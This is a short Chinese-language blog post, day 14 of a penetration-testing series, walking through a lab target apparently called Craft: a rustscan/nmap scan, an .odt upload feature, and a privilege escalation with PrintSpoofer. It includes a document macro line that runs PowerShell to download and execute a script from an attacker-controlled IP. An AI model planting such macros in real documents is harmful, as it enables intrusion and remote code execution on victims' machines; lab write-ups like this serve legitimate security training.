iT邦幫忙

2025 iThome 鐵人賽

DAY 14
0

偵查

rustscan -a <target_ip> --ulimit 5000 -- -sC -sV -o scan_result.txt 

列舉

  • 站點名稱 Craft 可以看看
  • 有上傳.odt的功能

試錯

需要構建一個 macro 來上傳到目標機器上,取得 normal user

Shell("cmd /c powershell ""iex(new-object net.webclient).downloadstring('http://192.168.45.184/oneliner.ps1')""")

提權

whoami /priv可使用printspoofer


上一篇
Day 13. Authby
下一篇
Day 15. Hutch
系列文
滲透測試 30 天:從基礎到實戰17
圖片
  熱門推薦
圖片
{{ item.channelVendor }} | {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言